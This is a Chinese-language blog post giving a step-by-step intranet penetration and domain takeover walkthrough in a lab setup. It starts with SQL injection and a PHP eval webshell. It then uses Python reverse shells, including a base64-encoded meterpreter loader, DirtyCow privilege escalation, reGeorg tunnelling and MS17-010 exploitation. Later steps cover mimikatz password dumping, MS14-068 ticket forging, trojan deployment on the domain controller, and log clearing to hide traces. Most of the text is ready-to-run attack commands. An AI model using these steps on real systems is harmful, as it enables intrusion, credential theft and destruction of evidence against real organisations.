写点什么

内网渗透横向攻击流程

发布于: 5 小时前

拓扑环境

  1. Kali Linux(攻击机)

  2. Centos6.4(web 服务器)

  3. win7(域成员主机无法上网)

  4. win2008R2(域控无法上网)


目的

通过 Kali Linux 拿到域控权限


2021最新整理网络安全\渗透测试/安全学习(全套视频、大厂面经、精品手册、必备工具包)一>点我<一

Web 渗透

目录扫描

使用 dirbuster 工具扫描网站根目录设置 kali 默认字典文件 /usr/share/wordlists/dirbuster/directory­list­lowercase­2.3­small.txt



扫描获得 phpinfo.php



得到网站绝对路径信息


SQL 查询报错

通过测试发现存在 sql 整型注入报错情况,进一步获取 webshell


SQL 注入

通过 sqlmap 测试发现存在 sql 注入


sqlmap ‐u "http://IP:8888/newsshow.php?cid=4&id=19*" ‐‐dbms MYSQL ‐v3


获取 webshell

这里有绝对路径的情况下,可直接写入 webshell。这里使用 sqlmap os­shell 的功能

sqlmap(os­shell)

#通过 sqlmap 获取命令执行会话 sqlmap ‐u "http://IP/newsshow.php?cid=4&id=19*" ‐‐dbms MYSQL ‐v3 ‐‐os‐ shell`


直接写 webshell(pass)

http://IP/newsshow.php?cid=4&id=19 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,0x3c3f706870206576616c28245f504f53545b2770617373275d29 3f3e,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile '/var/www/html/webshell.php'

反弹 shell

为了更好做后续操作,进行反弹 shell

获取目标系统信息

os‐shell> uname ‐aos‐shell> whereis python`


获取 meterpreter 会话

由于网站上为 linux 默认安装 python,可直接生成 python 反弹脚本


#生成 python 反弹脚本 msfvenom ‐p python/meterpreter/reverse_tcp LHOST=IP LPORT=4444 ‐f raw#msf 监听反向连接会话 msfconsoleuse exploit/multi/handlerset payload python/meterpreter/reverse_tcp set LHOST IPset LPORT 4444run#msf 监听快速启动 cat py_reverse_tcp.rcuse exploit/multi/handlerset payload python/meterpreter/reverse_tcp set LHOST 192.168.0.17set LPORT 4444


exploitmsfconsole ‐r py_reverse_tcp.rc


#在 sqlmap os‐shell 模式下执行 python meterpreter 反弹脚本


os‐shell> python ‐c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF‐8')} [sys.version_info[0]] ('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQ0KZm9yIHggaW4gcmFuZ2UoMTApOg0KCXRy eToNCgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KCQlzLmNvbm 5lY3QoKCYjMzk7SVAmIzM5Oyw0NDQ0KSkNCgkJYnJlYWsNCglleGNlcHQ6DQoJCXRpbWUu c2xlZXAoNSkNCmw9c3RydWN0LnVucGFjaygmIzM5OyZndDtJJiMzOTsscy5yZWN2KDQpKV swXQ0KZD1zLnJlY3YobCkNCndoaWxlIGxlbihkKSZsdDtsOg0KCWQrPXMucmVjdihsLWxl bihkKSkNCmV4ZWMoZCx7JiMzOTtzJiMzOTs6c30pDQo=')))"
复制代码


nc+python 反弹

#kali 监听会话


root@kali:~# nc ‐lvvp 6666#在sqlmap os‐shell模式下执行python bash反弹脚本os‐shell> python ‐c "import os;import pty;import socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((' IP',6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.filen o(),2);os.putenv('HISTFILE','/dev/null');pty.spawn('/bin/bash');s.clos e();"` 
复制代码


sqlmap 执行:



监听端口返回反弹 shell 结果:


提权

拿到 shell 后,尝试提升权限

查看当前内核版本

通过 uname ­a 获取当前系统内核版本


使用已知漏洞提权

根据可已知内核漏洞下载对应的提权程序(该处使用脏牛内核提权)


cd /tmp/ wget ‐‐no‐check‐certificate https://raw.githubusercontent.com/K3vinPlus/sundry/master/DirtyCow/dir ty.c gcc ‐pthread dirty.c ‐o dirty ‐lcrypt ./dirty 123456



获得 firefart 用户,权限为 root


su firefart



切换用户为 firefart 后,将 passwd 恢复,避免 root 用户无法使用


mv /tmp/passwd.bak /etc/passwd


横向渗透

通过查看网卡信息后发现存在内网地址信息


内网代理

meterpreter 自动路由(首选)


meterpreter > run autoroute ‐s 10.0.1.0/24 meterpreter > run autoroute ‐p


reGeorg+proxychains

由于 web 服务器第二张网卡无法上网,需进行内网代理


在 web 服务器的 shell 下,下载 tunnel.nosocket.php 文件,做代理流量


1、网络下载 wget ‐‐no‐check‐certificate https://raw.githubusercontent.com/K3vinPlus/reGeorg/master/tunnel.noso cket.php mv tunnel.nosocket.php /var/www/html/ 2、本地上传 upload /root/reGeorg/tunnel.nosocket.php /var/www/html



可正常访问 tunnel.nosocket.php 文件


[



Kali 上执行 reGeorg 代理脚本


python reGeorgSocksProxy.py ‐p 9999 ‐u http://IP:8888/tunnel.nosocket.php



修改 proxychains 配置文件,在末行添加 socks 信息。


vim /etc/proxychains.conf socks5 127.0.0.1 9999



##msf 自带代理设置


setg Proxies socks5:127.0.0.1:9999

内网资产扫描

端口扫描

使用 msf 自带端口扫描模块,探测出 10.0.1.9 和 10.0.1.254 都存在 445、3389 端口。


use auxiliary/scanner/portscan/tcp set RHOSTS 10.0.1.1/24 set PORTS 21,22,23,80,389,445,873,1433,1521,2049,2181,2375,3306,3389,4899,5432,5 631,5900,5938,5984,6379,8000,8080,7001,9080,9200,10051,11211,20880,270 17,50070 set THREADS 10 exploit

10.0.1.9 IP 端口开放情况

10.0.1.254 IP 端口开放情况

MS17­010 漏洞主机扫描

通过代理方式,使用 msf 框架扫描内网网段中存在 MS17­010 漏洞主机


root@kali:~# proxychains msfconsole use auxiliary/scanner/smb/smb_ms17_010 set RHOST 10.0.1.0‐254 set threads 10 exploit




MS17­010 漏洞利用

通过 meterpreter 路由方式,background 之后使用 ms17­010 攻击模块进行攻击


use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set RHOSTS 10.0.1.9 run


域渗透

信息收集

查看当前主机信息

meterpreter > sysinfo


获取当前域

使用 mimikatz 获取密码

加载 mimikatz 模块


meterpreter > load mimikatz #读取内存中存放的账号密码明文信息 meterpreter > wdigest


获取域账号 SID

meterpreter > run post/windows/gather/enum_logged_on_users


域控定位

net group "domain controllers" /domain ping dc1.kevin.com



MS14­068

python 脚本生成票据

proxychains python ms14‐068.py ‐u liujiafeng@kevin.com ‐s S‐1‐5‐21‐ 4289546598‐4075965387‐827630551‐1111 ‐d 10.0.1.254 ‐p kevin@123

msf 模块生成票据

use auxiliary/admin/kerberos/ms14_068_kerberos_checksum set DOMAIN KEVIN.com set USER liujiafeng set PASSWORD kevin@123 set USER_SID S‐1‐5‐21‐4289546598‐4075965387‐827630551‐1111 set RHOST 10.0.1.254


本地生成 kirbi 文件

#kali切换目录到loot下将ms14‐068 bin票据复制到物理机 /root/.msf4/loot/ #物理机通过mimikatz转为kirbi文件 mimikatz # kerberos::clist 20191223050146_default_10.0.1.254_windows.kerberos_122860.bin /export


kirbi 转为 ccache

#再将kirbi文件放到kali ticket_converter转换脚本目录下 #将kirbi文件转为ccache python ticket_converter.py 0‐00000000‐liujiafeng@krbtgt‐KEVIN.COM.kirbi TGT_liujiafeng@kevin.com.ccache mv TGT_liujiafeng@kevin.com.ccache /root/pykek/


生成正向连接的 msf test.exe 木马

生成 msf 监听端口程序


msfvenom ‐p windows/x64/meterpreter/bind_tcp LHOST=10.0.1.254 LPORT=4444 ‐f exe ‐o /root/pykek/test.exe


新建一个 msf 会话监听正向连接 payload


use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set RHOST 10.0.1.254

上传利用工具

上传利用工具、ms14­086 黄金票据到 win7 跳板机上


upload /root/pykek/TGT_liujiafeng@kevin.com.ccache C:/users/kevin upload /usr/share/windows‐resources/mimikatz/x64/mimikatz.exe C:/Users/kevin upload /root/pykek/test.exe c:/users/kevin shell


票据导入

在 win7 跳板机上执行


`#清空票据 klist purge#导入票据


cd c:/users/kevinmimikatz.exekerberos::ptc TGT_liujiafeng@kevin.com.ccache
复制代码

复制木马到域控

再通过 win7 跳板机复制 test.exe 到域控 c 盘,并通过 at 命令添加定时任务执行 test.exe


`copy test.exe \dc1.kevin.com\c$ dir \dc1.kevin.com\c<pre class="copy-codeblocks" style="font-family: Consolas, Menlo, Monaco, "Lucida Console", "Liberation Mono", "DejaVu Sans Mono", "Bitstream Vera Sans Mono", "Courier New", monospace; font-size: 15.008px; display: block; position: relative; overflow: visible; color: rgb(34, 34, 34); font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-style: initial; text-decoration-color: initial;"


在域控上添加 at 定时任务执行木马

net time \\dc1.kevin.com at \\dc1.kevin.com 15:42:00 c:\test.exe



查看当前域控 at 定时任务


at \\dc1.kevin.com



在域控 at 定时任务执行后,连接域控 4444 端口



netstat ‐ano |findstr "4444"


所有获得的 meterpreter 会话

清除痕迹

结束 msf 木马进程,删除 exe 进程


at \\dc1.kevin.com 16:23:00 cmd /c del c:\test.exe


删除 win7 工具


cd c:/users/kevin rm TGT_liujiafeng@kevin.com.ccache rm mimikatz.exe


windows 删除系统日志


clearev

用户头像

我是一名网络安全渗透师 2021.06.18 加入

关注我,后续将会带来更多精选作品,需要资料+wx:mengmengji08

评论

发布
暂无评论
内网渗透横向攻击流程